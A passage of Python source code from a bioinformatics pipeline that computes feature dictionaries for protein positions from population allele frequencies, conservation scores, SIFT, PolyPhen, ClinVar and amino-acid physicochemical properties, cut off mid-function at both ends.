altered sites\n d['avg_maf_altered'] = 0 if sites_aa_alter_num == 0 else np.sum(maf_list) / float(sites_aa_alter_num)\n\n bins = [0, 0.001, 0.005, 0.01, 0.02, 0.04, 0.06, 0.08, 0.1, 0.2, 0.5]\n non_zero_maf_lst = np.array(maf_list)[np.nonzero(maf_list)[0].tolist()]\n maf_hist = np.histogram(non_zero_maf_lst, bins)[0]\n\n for i, maf_hist_value in enumerate(maf_hist):\n d['maf_hist_' + str(bins[i]) + '-' + str(bins[i + 1])] = maf_hist_value\n\n return d\n\n\ndef ExAC_population_features(pop_maf_list, pop_maf_syn_list, pop_maf_nonsyn_list):\n\n d = {}\n\n for i in range(len(an_str)):\n # populations total maf avg\n d['maf_' + an_str[i][3:]] = 0 if len(pop_maf_list[i]) == 0 else np.average(pop_maf_list[i])\n\n for i in range(len(an_str)):\n # populations syn maf avg\n d['maf_syn_' + an_str[i][3:]] = 0 if len(pop_maf_syn_list[i]) == 0 else np.average(pop_maf_syn_list[i])\n\n for i in range(len(an_str)):\n # populations non-syn maf avg\n d['maf_nonsyn_' + an_str[i][3:]] = 0 if len(pop_maf_nonsyn_list[i]) == 0 else np.average(pop_maf_nonsyn_list[i])\n\n return d\n\n\ndef ExAC_count_features(sites_aa_num, sites_aa_alter_num, sites_snp_num, sites_snp_alter_num):\n\n d = {}\n\n # Feature: number of alterations - aa level (raw and normalized by total number of matched positions)\n d['alter_num_aa'] = sites_aa_alter_num\n d['alter_num_aa_norm'] = 0 if sites_aa_num == 0 else sites_aa_alter_num / float(sites_aa_num)\n\n # Feature: number of alterations - DNA level (raw and normalized by total number of matched positions)\n d['alter_num_snp'] = sites_snp_alter_num\n d['alter_num_snp_norm'] = 0 if sites_snp_num == 0 else sites_snp_alter_num / float(sites_snp_num)\n\n # Feature: average number of poymorphisms at one site\n d['avg_aa_polymorphisms'] = 0 if sites_aa_alter_num == 0 else sites_poly_aa_num / float(sites_aa_alter_num)\n\n # Feature: fraction of altered sites with more than 1 polymorphism\n d['frac_poly_aa'] = 1 if sites_aa_alter_num == 0 else sites_poly_aa_several / float(sites_aa_alter_num)\n\n return d\n\n\ndef ExAC_rareSNP_features(sites_snp_alter_num, rare_5_num, rare_05_num, rare_005_num):\n\n # Feature: fraction of rare SNPs (0.5%, 0.05%, 0.005%)\n return {\n 'rare_poly_0.5': 0 if sites_snp_alter_num == 0 else rare_5_num / float(sites_snp_alter_num),\n 'rare_poly_0.05': 0 if sites_snp_alter_num == 0 else rare_05_num / float(sites_snp_alter_num),\n 'rare_poly_0.005': 0 if 
sites_snp_alter_num == 0 else rare_005_num / float(sites_snp_alter_num)\n }\n\n\ndef conservation_features(phastCons_dict, phyloP_dict):\n\n d = {}\n positions = 1, 2, 3 # codon positions\n\n phastCons = np.vstack(phastCons_dict[p] for p in positions)\n phyloP = np.vstack(phyloP_dict[p] for p in positions)\n\n # conservation scores avg for each codon position\n phastCons_mean = np.nanmean(phastCons, axis=1)\n for p in positions:\n d[f'phastCons{p}_avg'] = phastCons_mean[p-1]\n\n phyloP_mean = np.nanmean(phyloP, axis=1)\n for p in positions:\n d[f'phyloP{p}_avg'] = phyloP_mean[p-1]\n\n # Features: conservation scores histograms for each codon position - phastCons\n phastCons_bins = np.concatenate((np.linspace(0, 0.75, 4), np.linspace(0.8, 1.0, 5)), axis=0)\n for p in positions:\n hist, _ = np.histogram(phastCons[p-1, :], phastCons_bins)\n for i, hist_value in enumerate(hist):\n d[f'phastCons{p}_hist_{phastCons_bins[i]}-{phastCons_bins[i+1]}'] = hist_value\n\n # Features: conservation scores histograms for each codon position - phyloP\n phyloP_bins = np.concatenate((np.array([-14, -1]), np.linspace(0, 3, 4), np.linspace(3.5, 6, 6)), axis=0)\n for p in positions:\n hist, _ = np.histogram(phyloP[p-1, :], phyloP_bins)\n for i, hist_value in enumerate(hist):\n d[f'phyloP{p}_hist_{phyloP_bins[i]}-{phyloP_bins[i+1]}'] = hist_value\n\n # Features: histogram of avg in each codon\n phastCons_codons_avg = np.nanmean(phastCons, axis=0)\n hist, _ = np.histogram(phastCons_codons_avg, phastCons_bins)\n for i, hist_value in enumerate(hist):\n d[f'phastCons_codons_hist_{phastCons_bins[i]}-{phastCons_bins[i+1]}'] = hist_value\n\n phyloP_codons_avg0 = np.nanmean(phyloP, axis=0)\n hist, _ = np.histogram(phyloP_codons_avg0, phyloP_bins)\n for i, hist_value in enumerate(hist):\n d[f'phyloP_codons_hist_{phyloP_bins[i]}-{phyloP_bins[i+1]}'] = hist_value\n\n return d\n\n\ndef sub_matrix_features(sub_list, weigted_sub_list, sub_name):\n if len(sub_list) == 0:\n sub_avg = weigted_sub_avg = sub_postivies = sub_negatives = sub_ratio = 1\n else:\n # Feature: BLOSUM62 average and frequency weighted-average\n sub_avg = sum(sub_list) / float(len(sub_list))\n weigted_sub_avg = sum(weigted_sub_list) / float(len(weigted_sub_list))\n\n # Feature: BLOSUM62 count of positives and negatives\n sub_postivies = sum(1 for x in sub_list if x > 0)\n sub_negatives = sum(1 for x in sub_list if x < 0)\n\n # Feature: BLOSUM62 positives/negatives ratio\n if sub_postivies == 0 or sub_negatives == 0:\n sub_ratio = 0\n else:\n sub_ratio = sub_postivies / float(sub_negatives)\n\n return {\n f'{sub_name}_avg': sub_avg,\n f'{sub_name}_avg_weighted': weigted_sub_avg,\n f'{sub_name}_positive_num': sub_postivies,\n f'{sub_name}_negative_num': sub_negatives,\n f'{sub_name}_ratio': sub_ratio\n }\n\n\ndef SIFT_features(sift_scores_list, weighted_sift_scores_list):\n if len(sift_scores_list) > 0:\n # Feature: SIFT average\n sift_avg = np.mean(sift_scores_list)\n\n # Feature: weighted (by frequency) SIFT average\n sift_w_avg = np.mean(weighted_sift_scores_list)\n\n # Feature: SIFT number of deleterious (score <=0.05)\n sift_deleterious_num = sum(1 for x in sift_scores_list if x <= SIFT_THRESHOLD)\n\n # Feature: SIFT number of tolerated (score > 0.05)\n sift_tolerated_num = sum(1 for x in sift_scores_list if x > SIFT_THRESHOLD)\n\n # Feature: deleterious/tolerated ratio\n if sift_tolerated_num == 0 or sift_deleterious_num == 0:\n sift_ratio = 0\n else:\n sift_ratio = sift_deleterious_num / float(sift_tolerated_num)\n\n # Feature: SIFT 
\"majority-decision\" (deleterious/tolerated)\n if sift_deleterious_num > sift_tolerated_num:\n sift_majority = sift_codes.SIFT_DELETERIOUS.value\n elif sift_tolerated_num > sift_deleterious_num:\n sift_majority = sift_codes.SIFT_TOLERATED.value\n else:\n sift_majority = sift_codes.SIFT_TIE.value\n\n else:\n sift_avg = sift_w_avg = -1\n sift_deleterious_num = 0\n sift_tolerated_num = 0\n sift_ratio = 1\n sift_majority = sift_codes.SIFT_TIE.value\n\n return {\n 'sift_avg': sift_avg,\n 'sift_avg_weighted': sift_w_avg,\n 'sift_deleterious_num': sift_deleterious_num,\n 'sift_tolerated_num': sift_tolerated_num,\n 'sift_ratio': sift_ratio,\n 'sift_majority': sift_majority\n }\n\n\ndef PolyPhen_features(polyphen_scores_list, polyphen_pred_list, weighted_polyphen_scores_list):\n if len(polyphen_scores_list) > 0:\n # Feature: PolyPhen average\n polyphen_avg = np.mean(polyphen_scores_list)\n\n # Feature: weighted (by frequency) PolyPhen average\n polyphen_w_avg = np.mean(weighted_polyphen_scores_list)\n\n # Feature: polyPhen number of benign\n polyphen_benign_num = polyphen_pred_list.count(\"benign\")\n\n # Feature: polyPhen number of possibly_damaging\n polyphen_possibly_num = polyphen_pred_list.count(\"possibly_damaging\")\n\n # Feature: polyPhen number of probably_damaging\n polyphen_probably_num = polyphen_pred_list.count(\"probably_damaging\")\n\n # Feature: polyPhen \"majority-decision\" (benign/possibly_damaging/probably_damaging/unknown)\n if ((polyphen_benign_num > polyphen_probably_num and polyphen_benign_num > polyphen_possibly_num) or\n (polyphen_benign_num > polyphen_probably_num and polyphen_benign_num == polyphen_possibly_num)):\n polyphen_majority = polyphen_codes.POLYPHEN_BENIGN.value\n\n elif ((polyphen_probably_num > polyphen_benign_num and polyphen_probably_num > polyphen_possibly_num) or\n (polyphen_probably_num > polyphen_benign_num and polyphen_probably_num == polyphen_possibly_num)):\n polyphen_majority = polyphen_codes.POLYPHEN_PROBABLY.value\n\n elif polyphen_possibly_num > polyphen_benign_num and polyphen_possibly_num > polyphen_probably_num:\n polyphen_majority = polyphen_codes.POLYPHEN_POSSIBLY.value\n\n elif polyphen_benign_num == polyphen_probably_num == polyphen_possibly_num:\n polyphen_majority = polyphen_codes.PLOYPHEN_EQUAL.value\n\n else:\n polyphen_majority = polyphen_codes.POLYPHEN_UNKNOWN.value\n\n else:\n polyphen_avg = polyphen_w_avg = -1\n polyphen_benign_num = 0\n polyphen_possibly_num = 0\n polyphen_probably_num = 0\n polyphen_majority = polyphen_codes.POLYPHEN_UNKNOWN.value\n\n return {\n 'polyphen_avg': polyphen_avg,\n 'polyphen_avg_weighted': polyphen_w_avg,\n 'polyphen_benign_num': polyphen_benign_num,\n 'polyphen_possibly_num': polyphen_possibly_num,\n 'polyphen_probably_num': polyphen_probably_num,\n 'polyphen_majority': polyphen_majority\n }\n\n\ndef ClinVar_scores(clinsig_list, clinsig_af):\n valid_scores = []\n valid_scores_weighted = []\n\n for i in range(len(clinsig_list)):\n sig = clinsig_list[i]\n sig_list = pd.Series(sig.split(\"&\")).unique().tolist()\n # Skipping\n if \"not\" in sig_list or \"\" in sig_list:\n continue\n\n # Determine the alteration clinvar score\n if len(sig_list) == 1 and sig_list[0] == \"pathogenic\":\n score = clinvar_codes.CLINVAR_PATHOGENIC.value\n elif len(sig_list) == 1 and sig_list[0] == \"benign\":\n score = clinvar_codes.CLINVAR_BENIGN.value\n elif len(sig_list) == 2 and \"benign\" in sig_list and \"likely\" in sig_list:\n score = clinvar_codes.CLINVAR_LIKELY_BENIGN.value\n elif len(sig_list) == 2 and 
\"pathogenic\" in sig_list and \"uncertain\" in sig_list:\n score = clinvar_codes.CLINVAR_LIKELY_PATHOGENIC.value\n elif len(sig_list) == 2 and \"pathogenic\" in sig_list and \"other\" in sig_list:\n score = clinvar_codes.CLINVAR_PATHOGENIC_OTHER.value\n else:\n score = clinvar_codes.CLINVAR_UNCERTAIN.value # value of 0\n\n valid_scores.append(score)\n score_af = clinsig_af[i]\n valid_scores_weighted.append(score * score_af)\n\n # ===Feature: Avg. and weighted avg. ClinVar score===#\n if len(valid_scores) == 0:\n avg_clinvar_score = 0\n avg_w_clinvar_score = 0\n else:\n avg_clinvar_score = np.mean(valid_scores)\n avg_w_clinvar_score = np.mean(valid_scores_weighted)\n\n return {\n 'avg_clinvar_score': avg_clinvar_score,\n 'avg_clinvar_weighted': avg_w_clinvar_score\n }\n\n\ndef entropy_features(maf_list):\n # Calculates a normalized Shannon entropy (from Miller et al, 2015) of nonsyn SNPs distributed across instances\n maf = np.array(maf_list)\n if np.sum(maf) == 0:\n # if no SNPs- each instance has the prob. = max. entropy ln(n)\n e = np.log(len(maf))\n else:\n # Filter out nans; scipy.stats.entropy automatically normalizes the input\n # We divide the result by ln(|x|) to account for different sized inputs\n e = entropy(maf[~np.isnan(maf)]) / np.log(len(maf))\n\n return {'snp_nonsyn_entropy': e}\n\n\ndef pseudo_dNdS_features(ref_seq, Nd, Sd):\n N, S = seq_ns(ref_seq) # Reference expected syn/nonsyn per site\n PN = 0 if N == 0 else Nd / float(N) # Proportion of nonsyn\n PS = 0 if S == 0 else Sd / float(S) # Proportion of syn\n\n # num of nonsyn substitutions per nonsyn site\n dN = -0.75 * (np.log(1 - 4 * PN / float(3)))\n\n # num of syn substitutions per syn site\n if 4 * PS / float(3) >= 1:\n dS = 1\n else:\n dS = -0.75 * (np.log(1 - 4 * PS / float(3)))\n\n if dN == 0 or dS == 0:\n dN_dS = 1 # There isn't enough information to calculate dN/dS (1 is a neutral value)\n else:\n dN_dS = dN / dS\n if dN_dS == np.nan:\n dN_dS = 1 # There isn't enough information to calculate dN/dS (1 is a neutral value)\n\n return {\n 'pseudo_nonsyn': dN,\n 'pseudo_syn': dS,\n 'pseudo_dNdS': dN_dS\n }\n\n\ndef pfam_emission_prob_features(hmm_prob_dict, state):\n # Max. emission probability + emission prob. for each amino acid\n probs = hmm_prob_dict[state]\n d = {'pfam_prob_max': max(probs)}\n d.update({f'pfam_prob_{pfam_aa_order[i]}': prob for i, prob in enumerate(probs)})\n return d\n\n\ndef pfam_conserved_state_feature(state, con_states_dict):\n # is state is conserved according to Pfam?\n return {'is_pfam_conserved': state in con_states_dict}\n\n\ndef instance_individuals_100way_change_features(maf_list, aa_ref_hist, jsd100way_list):\n\n # Computing Orthologus conservation in different ways (from 100way-ucsc alignment)\n # Computing Paralogus conservartion in different ways (from different instances)\n # Combining both to measurments that maximize ortho. con. and minimize para. 
con.\n\n ## Paralogus ##\n\n # fraction of change across instances\n\n # determine majority aa (index of one of the majority)\n minor_counts = 0\n max_pos = aa_ref_hist.index(max(aa_ref_hist))\n for i in range(len(aa_ref_hist)):\n if i == max_pos:\n continue\n minor_counts += aa_ref_hist[i]\n\n instances_change_frac = minor_counts / float(np.sum(aa_ref_hist))\n\n # Feature: entropy of ref AA\n aa_ref_entropy = SE_hist(aa_ref_hist)\n\n # JSD of ref AA\n aa_ref_jsd = JSD_hist(aa_ref_hist, background=JSD_background.BLOSUM62)\n\n ## Orthologus ##\n\n # first remove -1 illegal scores of JSD mismatch (positions where JSD alignment didn't match, I added -1):\n jsd100way_list_no_mismatch = [i for i in jsd100way_list if i != -1]\n\n # median JSD score across 100way vertbrates\n med_jsd = 0 if len(jsd100way_list_no_mismatch) == 0 else np.median(jsd100way_list_no_mismatch)\n\n # Histogram of JSD score across 100way vertebrates\n jsd_median_bins = [0, 0.5, 0.6, 0.7, 0.8, 1]\n jsd_median_hist = np.histogram(jsd100way_list_no_mismatch, bins=jsd_median_bins)[0]\n\n # Functional measurements of both\n # ratio: change across instances / change across individuals(MAF)\n\n # low MAF (orthologues), high instances change (paralogous) = SDPs\n if np.sum(maf_list) == 0:\n avg_maf_overall = 0.0000001 # set the minimal non-zero in our data\n else:\n avg_maf_overall = np.sum(maf_list) / float(len(maf_list))\n\n max_entropy = SE_hist([0] * len(AMINO_ACIDS))\n\n return dict(\n [\n ('instances_change_frac', instances_change_frac),\n ('aa_ref_SE', aa_ref_entropy),\n ('aa_ref_jsd', aa_ref_jsd),\n ('med_jsd_100way_blosum', med_jsd)\n ] +\n [\n (f'jsd_median_hist_{jsd_median_bins[i]}-{jsd_median_bins[i + 1]}', jsd_median_hist[i])\n for i in range(len(jsd_median_bins) - 1)\n ] +\n [\n ('instances_individuals_change_ratio', instances_change_frac / float(avg_maf_overall)),\n\n # high JSD (orthologues), high instances change (paralogous) = SDPs\n # we want high MAF -> small 1 - MAF, high JSD\n ('jsd_100way_instances_major_ratio', med_jsd / float(1 - instances_change_frac)),\n\n # high JSD (orthologues), high shannon entropy (paralogous) = SDPs\n ('jsd_mul_aa_ref_SE', med_jsd * aa_ref_entropy),\n\n # high JSD (orthologues), low diff. of max SE to shannon entropy (paralogous) = SDPs\n ('jsd_SE_diff_ratio', med_jsd / float(max_entropy - aa_ref_entropy)),\n\n # high JSD (orthologues), high shannon entropy (paralogous) = SDPs\n ('jsd_SE_sum', med_jsd + (aa_ref_entropy / float(max_entropy))),\n\n # high shannon entropy (paralogous), low diff. 
of max JSD to avg JSD (orthologues) = SDPs\n ('SE_jsd_diff_ratio', aa_ref_entropy / float(1 - med_jsd)),\n\n # high JSD (orthologues), low JSD (paralogoues) = SDPs\n ('jsds_ratio', med_jsd / float(aa_ref_jsd)),\n\n # high difference between orthoulogus (more conserved) and paralogous (less conserved)\n ('jsds_subtraction', med_jsd - aa_ref_jsd)\n ]\n\n )\n\n\ndef aa_identity_features(aa_ref_hist, type_str):\n # aa identity histogram and probability\n if np.sum(aa_ref_hist) == 0:\n aa_ref_prob = aa_ref_hist\n else:\n aa_ref_prob = np.asarray(aa_ref_hist) / float(np.sum(aa_ref_hist))\n\n d = {f'{type_str}_hist_{aa}': aa_ref_hist_i for aa, aa_ref_hist_i in zip(AMINO_ACIDS, aa_ref_hist)}\n d.update({f'{type_str}_prob_{aa}': aa_ref_prob_i for aa, aa_ref_prob_i in zip(AMINO_ACIDS, aa_ref_prob)})\n return d\n\n\ndef major_allele_charge(aa_ref_hist):\n # ===Feature: major allele aa charge counts===#\n charge_positive_count = charge_negative_count = charge_neutral_count = 0\n for i in range(len(AMINO_ACIDS)):\n aa_count = aa_ref_hist[i]\n if aa_count > 0:\n charge = aa_charge_dict[AMINO_ACIDS[i]]\n if charge.value == 0:\n charge_neutral_count += aa_count\n elif charge.value == 1:\n charge_positive_count += aa_count\n else:\n charge_negative_count += aa_count\n\n # ===Feature: major allele majority charge===#\n charge_majority = aa_charge.NEUTRAL.value\n if charge_positive_count > charge_neutral_count and charge_positive_count > charge_negative_count:\n charge_majority = aa_charge.POSITIVE.value\n elif charge_negative_count > charge_neutral_count and charge_negative_count > charge_positive_count:\n charge_majority = aa_charge.NEGATIVE.value\n\n return {\n 'aa_ref_charge_positive_count': charge_positive_count,\n 'aa_ref_charge_negative_count': charge_negative_count,\n 'aa_ref_charge_neutral_count': charge_neutral_count,\n 'aa_ref_charge_majority': charge_majority\n }\n\n\ndef major_allele_functional_group(aa_ref_hist):\n # major allele aa functional group counts\n func_counters = [0] * (len(aa_functional_group) - 1) # Major allele is never a stop codon\n for i in range(len(AMINO_ACIDS)):\n aa_count = aa_ref_hist[i]\n if aa_count > 0:\n func_group_num = aa_functional_group_dict[\n AMINO_ACIDS[i]].value # getting numeric functional group value\n if func_group_num == aa_functional_group.STOP.value: # Major allele is never a stop codon\n continue\n func_counters[func_group_num] += aa_count\n\n return {\n k: v for k, v in zip(\n [f'aa_ref_{group}_count' for group in aa_functional_group if group != aa_functional_group.STOP],\n func_counters\n )\n }\n\n\ndef sub_diff_functional_group(ref_alt_pairs):\n # ===Features: count and frequency staying in functional group Vs. 
moving to other group===#\n stay_cnt = stay_cnt_freq = move_cnt = move_cnt_freq = 0\n\n for (ref, alt, af) in ref_alt_pairs:\n ref_func_group = aa_functional_group_dict[ref].value\n alt_func_group = aa_functional_group_dict[alt].value\n if ref_func_group == alt_func_group:\n stay_cnt += 1\n stay_cnt_freq += af\n else:\n move_cnt += 1\n move_cnt_freq += af\n\n # ===Features: functional groups transitions counts===#\n transitions_vec_size = (len(aa_functional_group) - 1) * len(\n aa_functional_group) # excluding transitions from STOP codons\n transitions_vec = [0] * transitions_vec_size\n\n for (ref, alt, af) in ref_alt_pairs:\n ref_func_group = aa_functional_group_dict[ref].value\n alt_func_group = aa_functional_group_dict[alt].value\n # Calculate counter position on the vector (ref_func_group is never STOP = 5)\n trans_vec_i = ref_func_group * (len(aa_functional_group) - 1)\n trans_vec_i += alt_func_group\n transitions_vec[trans_vec_i] += 1\n\n keys = [f'sub_func_group_trans_{i}-{j}' for i in range(len(aa_functional_group) - 1) for j in range(len(aa_functional_group))]\n\n return dict([\n ('sub_func_group_stay_cnt', stay_cnt),\n ('sub_func_group_stay_freq', stay_cnt_freq),\n ('sub_func_group_move_cnt', move_cnt),\n ('sub_func_group_move_freq', move_cnt_freq)\n ] + [(k, v) for k, v in zip(keys, transitions_vec)])\n\n\ndef major_allele_hydrophobicity(aa_ref_hist):\n # major allele hydrophicity average, hydrophobic and polar counts\n h_sum = h_cnt = hydrophobic_cnt = polar_charge_cnt = 0\n for i in range(len(AMINO_ACIDS)):\n aa_count = aa_ref_hist[i]\n if aa_count > 0:\n hindex = kd.get(AMINO_ACIDS[i], 0)\n h_sum += hindex * aa_count\n h_cnt += aa_count\n\n if hindex > 0:\n hydrophobic_cnt += aa_count\n else:\n polar_charge_cnt += aa_count\n\n h_avg = 0 if h_cnt == 0 else h_sum / float(h_cnt)\n\n return {\n 'hindex_avg': h_avg,\n 'hindex_pos_cnt': hydrophobic_cnt,\n 'hindex_neg_cnt': polar_charge_cnt\n }\n\n\ndef sub_diff_hydrophobicity(ref_alt_pairs):\n # hydrophicity difference average and weighted average\n hindex_diff_sum = hindex_diff_sum_weighted = hindex_diff_cnt = 0\n for (ref, alt, af) in ref_alt_pairs:\n hindex_diff = kd.get(alt, 0) - kd.get(ref, 0)\n hindex_diff_sum += hindex_diff\n hindex_diff_sum_weighted += hindex_diff * af\n hindex_diff_cnt += 1\n\n if hindex_diff_cnt == 0:\n hindex_diff_avg = hindex_diff_avg_weighted = 0\n else:\n hindex_diff_avg = hindex_diff_sum / float(hindex_diff_cnt)\n hindex_diff_avg_weighted = hindex_diff_sum_weighted / float(hindex_diff_cnt)\n\n return {\n 'sub_diff_hindex_avg': hindex_diff_avg,\n 'sub_diff_hindex_avg_weighted': hindex_diff_avg_weighted\n }\n\n\ndef major_allele_volume(aa_ref_hist):\n # major allele volume average, tiny, small and big counts\n vol_sum = vol_cnt = tiny_cnt = small_cnt = big_cnt = 0\n for i in range(len(AMINO_ACIDS)):\n aa_count = aa_ref_hist[i]\n if aa_count > 0:\n volume = aa_volume[AMINO_ACIDS[i]]\n vol_sum += volume * aa_count\n vol_cnt += aa_count\n\n vol_group = aa_volume_group_dict[AMINO_ACIDS[i]]\n if vol_group == aa_volume_group.TINY:\n tiny_cnt += aa_count\n elif vol_group == aa_volume_group.SMALL:\n small_cnt += aa_count\n elif vol_group == aa_volume_group.BIG:\n big_cnt += aa_count\n\n vol_avg = 0 if vol_cnt == 0 else vol_sum / float(vol_cnt)\n\n return {\n 'vol_avg': vol_avg,\n 'vol_tiny_cnt': tiny_cnt,\n 'vol_small_cnt': small_cnt,\n 'vol_big_cnt': big_cnt\n }\n\n\ndef sub_diff_volume(ref_alt_pairs):\n # ===Feature: volume difference average and weighted average===#\n volume_diff_sum = 0\n 
volume_diff_sum_weighted = 0\n volume_diff_cnt = 0\n for (ref, alt, af) in ref_alt_pairs:\n ref_vol = aa_volume[ref]\n alt_vol = aa_volume[alt]\n vol_diff = (ref_vol - alt_vol)\n volume_diff_sum += vol_diff\n volume_diff_sum_weighted += vol_diff * af\n volume_diff_cnt += 1\n\n if volume_diff_cnt == 0:\n volume_diff_avg = volume_diff_avg_weighted = 0\n else:\n volume_diff_avg = volume_diff_sum / float(volume_diff_cnt)\n volume_diff_avg_weighted = volume_diff_sum_weighted / float(volume_diff_cnt)\n\n return {\n 'sub_diff_vol_avg': volume_diff_avg,\n 'sub_diff_vol_avg_weighted': volume_diff_avg_weighted\n }\n\n\ndef major_allele_propensity(aa_ref_hist):\n prop_sum = [0, 0, 0]\n prop_cnt = 0\n prop_majority_counts = [0, 0, 0]\n for i in range(len(AMINO_ACIDS)):\n aa_count = aa_ref_hist[i]\n if aa_count > 0:\n curr_prop = propensity_chou_fasman[AMINO_ACIDS[i]]\n mul_curr_prop = [x * aa_count for x in curr_prop]\n prop_sum = [sum(x) for x in zip(prop_sum, mul_curr_prop)]\n prop_cnt += aa_count\n\n if curr_prop[aa_propensity.ALPHA_HELIX.value] == max(curr_prop):\n prop_majority_counts[aa_propensity.ALPHA_HELIX.value] += 1\n if curr_prop[aa_propensity.BETA_SHEET.value] == max(curr_prop):\n prop_majority_counts[aa_propensity.BETA_SHEET.value] += 1\n if curr_prop[aa_propensity.TURN.value] == max(curr_prop):\n prop_majority_counts[aa_propensity.TURN.value] += 1\n\n # ===Feature: major allele propensity avgs===#\n if prop_cnt == 0:\n prop_avg = [0, 0, 0]\n else:\n prop_avg = [x / float(prop_cnt) for x in prop_sum]\n\n # ===Feature: major allele majority propensity===#\n max_idx = np.where(np.array(prop_majority_counts) == max(prop_majority_counts))[0]\n majority_vec = [0, 0, 0]\n for i in max_idx:\n majority_vec[i] = 1 # put 1 in the propensities that has max. 
count\n\n    return {\n        'aa_ref_alpha_prop_avg': prop_avg[0],\n        'aa_ref_beta_prop_avg': prop_avg[1],\n        'aa_ref_turn_prop_avg': prop_avg[2],\n        'aa_ref_alpha_is_majority': majority_vec[0],\n        'aa_ref_beta_is_majority': majority_vec[1],\n        'aa_ref_turn_is_majority': majority_vec[2]\n    }\n\n\ndef sub_diff_propensity(ref_alt_pairs):\n    # ===Feature: propensity difference average===#\n    prop_vec_sum = [0, 0, 0]\n    prop_vec_sum_weighted = [0, 0, 0]\n    prop_cnt = 0\n    for (ref, alt, af) in ref_alt_pairs:\n        ref_struct = propensity_chou_fasman[ref]\n        alt_struct = propensity_chou_fasman[alt]\n        prop_diff = [(x - y) for (x, y) in zip(ref_struct, alt_struct)]\n        prop_diff_weighted = [(x - y) * af for (x, y) in zip(ref_struct, alt_struct)]\n        prop_vec_sum = [(x + y) for (x, y) in zip(prop_vec_sum, prop_diff)]\n        prop_vec_sum_weighted = [(x + y) for (x, y) in zip(prop_vec_sum_weighted, prop_diff_weighted)]\n\n        prop_cnt += 1\n\n    if prop_cnt == 0:\n        prop_vec_avg = prop_vec_avg_weighted = [0, 0, 0]\n    else:\n        prop_vec_avg = [(x / float(prop_cnt)) for x in prop_vec_sum]\n        prop_vec_avg_weighted = [(x / float(prop_cnt)) for x in prop_vec_sum_weighted]\n\n    return {\n        'sub_diff_prop_avg_alpha': prop_vec_avg[0],\n        'sub_diff_prop_avg_beta': prop_vec_avg[1],\n        'sub_diff_prop_avg_turn': prop_vec_avg[2],\n        'sub_diff_prop_avg_alpha_weighed': prop_vec_avg_weighted[0],\n        'sub_diff_prop_avg_beta_weighed': prop_vec_avg_weighted[1],\n        'sub_diff_prop_avg_turn_weighed': prop_vec_avg_weighted[2]\n    }\n\n\ndef major_allele_h_bonds(aa_ref_hist):\n    # avg donor and acceptor H-bond potential\n    donor_sum = acceptor_sum = bonds_cnt = 0\n    for i in range(len(AMINO_ACIDS)):\n        aa_count = aa_ref_hist[i]\n        if aa_count > 0:\n            donor_sum += (aa_h_bond_donor[AMINO_ACIDS[i]] * aa_count)\n            acceptor_sum += (aa_h_bond_acceptor[AMINO_ACIDS[i]] * aa_count)\n            bonds_cnt += aa_count\n\n    if bonds_cnt == 0:\n        donor_avg = 0\n        acceptor_avg = 0\n    else:\n        donor_avg = donor_sum / float(bonds_cnt)\n        acceptor_avg = acceptor_sum / float(bonds_cnt)\n\n    return {\n        'H_bond_donor_avg': donor_avg,\n        'H_bond_acceptor_avg': acceptor_avg\n    }\n\n\ndef sub_diff_h_bonds(ref_alt_pairs):\n    # acceptor and donor diff average and weighted average\n    donor_diff_sum = donor_diff_sum_weighted = acceptor_diff_sum = acceptor_diff_sum_weighted = diff_cnt = 0\n    for (ref, alt, af) in ref_alt_pairs:\n        donor_diff = aa_h_bond_donor[ref] - aa_h_bond_donor[alt]\n        donor_diff_sum += donor_diff\n        donor_diff_sum_weighted += donor_diff * af\n\n        ref_acceptor = aa_h_bond_acceptor[ref]\n        alt_acceptor = aa_h_bond_acceptor[alt]\n        acceptor_diff = (ref_acceptor - alt_acceptor)\n        acceptor_diff_sum += acceptor_diff\n        acceptor_diff_sum_weighted += acceptor_diff * af\n\n        diff_cnt += 1\n\n    if diff_cnt == 0:\n        donor_diff_avg = donor_diff_avg_weighted = 0\n        acceptor_diff_avg = acceptor_diff_avg_weighted = 0\n    else:\n        donor_diff_avg = donor_diff_sum / float(diff_cnt)\n        donor_diff_avg_weighted = donor_diff_sum_weighted / float(diff_cnt)\n        acceptor_diff_avg = acceptor_diff_sum / float(diff_cnt)\n        acceptor_diff_avg_weighted = acceptor_diff_sum_weighted / float(diff_cnt)\n\n    return {\n        'donor_diff_avg': donor_diff_avg,\n        'donor_diff_avg_weighted': donor_diff_avg_weighted,\n        'acceptor_diff_avg': acceptor_diff_avg,\n        'acceptor_diff_avg_weighted': acceptor_diff_avg_weighted\n    }\n\n\ndef spider_solvent_acc_pred(spider_dict):\n    # Accessible Surface Area (solvent accessibility) mean/std\n    return {\n        'solvent_acc_avg': np.nanmean(spider_dict[\"spider2-ASA\"]),\n        'solvent_acc_std': np.nanstd(spider_dict[\"spider2-ASA\"])\n    }\n\n\ndef 
spider_contact_number_pred(spider_dict):\n    return {\n        'hsa2_cn_avg': np.nanmean(spider_dict[\"spider2-hsa2_CN\"]),  # contact number for Cα-Cα mean\n        'hsa2_cn_std': np.nanstd(spider_dict[\"spider2-hsa2_CN\"]),  # contact number for Cα-Cα std\n        'hsb2_cn_avg': np.nanmean(spider_dict[\"spider2-hsb2_CN\"]),  # contact number for Cα-Cβ mean\n        'hsb2_cn_std': np.nanstd(spider_dict[\"spider2-hsb2_CN\"])  # contact number for Cα-Cβ std\n    }\n\n\ndef spider_angles_pred(spider_dict):\n    return {\n        'backbone_Phi_angle_avg': np.nanmean(spider_dict[\"spider2-angle_Phi\"]),  # backbone Phi angle mean\n        'backbone_Phi_angle_std': np.nanstd(spider_dict[\"spider2-angle_Phi\"]),  # backbone Phi angle std\n        'backbone_Psi_angle_avg': np.nanmean(spider_dict[\"spider2-angle_Psi\"]),  # backbone Psi angle mean\n        'backbone_Psi_angle_std': np.nanstd(spider_dict[\"spider2-angle_Psi\"]),  # backbone Psi angle std\n        'c-alpha_tau_angle_avg': np.nanmean(spider_dict[\"spider2-angle_tau\"]),  # c-alpha angle (i-2=>i+1) mean\n        'c-alph_tau_angle_std': np.nanstd(spider_dict[\"spider2-angle_tau\"]),  # c-alpha angle (i-2=>i+1) std\n        'c-alpha_theta_angle_avg': np.nanmean(spider_dict[\"spider2-angle_theta\"]),  # c-alpha angle (i-1=>i+1) mean\n        'c-alph_theta_angle_std': np.nanstd(spider_dict[\"spider2-angle_theta\"])  # c-alpha angle (i-1=>i+1) std\n    }\n\n\ndef spider_struct_pred(spider_dict):\n\n    # major allele majority propensity\n    values, counts = np.unique(np.array(spider_dict[\"spider2-2nd_struct\"]), return_counts=True)\n\n    # Note: An earlier iteration of the code returned all 3 spd_*_is_majority keys as 